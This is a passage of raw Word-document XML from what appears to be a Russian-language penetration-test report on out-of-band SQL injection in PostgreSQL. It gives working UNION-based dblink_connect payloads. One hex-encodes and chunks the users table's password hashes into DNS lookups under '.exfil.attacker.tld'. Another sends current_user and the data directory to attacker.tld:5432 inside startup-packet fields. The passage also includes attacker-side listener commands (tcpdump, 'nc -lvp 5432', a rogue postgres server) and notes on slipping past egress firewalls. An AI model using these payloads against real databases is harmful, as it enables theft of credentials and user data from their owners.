        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  'host=' || c || '.exfil.attacker.tld dbname=x user=x password=x'</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FROM (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WITH data AS (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT encode(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      convert_to(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        (SELECT string_agg(password_hash, ',') FROM users),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        'UTF8'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      ), 'hex'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ) AS hex</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substring(hex FROM (i*60+1) FOR 60) AS c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  FROM data, generate_series(0, (length(hex)-1)/60) i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) chunks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email FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 1, dblink_connect(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'host=' || c || '.exfil.attacker.tld dbname=x user=x password=x'</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FROM (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WITH data AS (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT encode(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            convert_to((SELECT string_agg(password_hash, ',') FROM users), 'UTF8'),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            'hex'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ) AS hex</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substring(hex FROM (i*60+1) FOR 60) AS c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM data, generate_series(0, (length(hex)-1)/60) i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) chunks --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На каждый chunk идёт отдельный DNS-запрос. Атакующий на authoritative-сервере склеивает labels в порядке прихода, делает hex-decode, разбивает по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получает все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 из таблицы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При пустой таблице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generate_series(0, -1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вернёт пустое множество — DNS-запросов не будет, это штатное поведение.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Authoritative DNS с query-log (bind):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">options { querylog yes; };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Или коллектор поверх tcpdump:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump -i any -nn -s0 'udp port 53' -w queries.pcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — TCP-канал, прямой (startup-packet)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий поднимает TCP-listener на 5432, получает значения, упакованные в поля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application_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> startup-пакета. SSL не требуется — libpq до SSL handshake шлёт startup-packet plaintext.</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1, dblink_connect('host=attacker.tld port=5432 user=' || current_user || ' application_name=' || current_setting('data_directory') || ' dbname=x password=x')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email FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 1, dblink_connect(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'host=attacker.tld port=5432 '</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'user=' || current_user || ' '</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'application_name=' || current_setting('data_directory') || ' '</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'dbname=x password=x'</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bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На стороне атакующего (минимум):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvp 5432 | xxd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">либо полноценный PG-сервер, который сам распарсит startup-packet:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres -D /tmp/empty --port=5432 --listen-addresses='*' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -c log_connections=on \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -c log_line_prefix='%m [%p] user=%u db=%d app=%a '</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Любые SQL-выражения, которые роль application может вычислить (включая подзапросы из системных view), можно вшить в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application_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Лимит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">application_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 64 символа по умолчанию (GUC-параметр). Для значений длиннее — разбивай через несколько коннектов или используй DNS-канал (Payload B).</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Эксфильтрация любых SELECT-данных, к которым имеет доступ application-роль, без необходимости получать данные через HTTP-ответ или error message. DNS-канал работает даже если egress firewall режет outbound TCP — UDP/53 наружу почти всегда открыт.</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под капотом вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQconnectdb()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> внутри backend-процесса PostgreSQL. Conninfo не валидируется как user input — функция спроектирована для DBA-сценариев federation/ETL.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libpq в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQconnectdb()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> первым шагом делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getaddrinfo(host)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — независимо от того, удастся ли затем TCP. DNS-запрос уходит из IP-адреса PostgreSQL-хоста до любого TCP-handshake.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При успешном </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getaddrinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> libpq делает TCP-коннект и сразу же шлёт startup-packet (фрейм с protocol version 196608 + key/value пары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database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application_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, опции). Эта последовательность жёстко зашита в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">fe-connect.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и не зависит от настроек сервера-приёмника.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Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
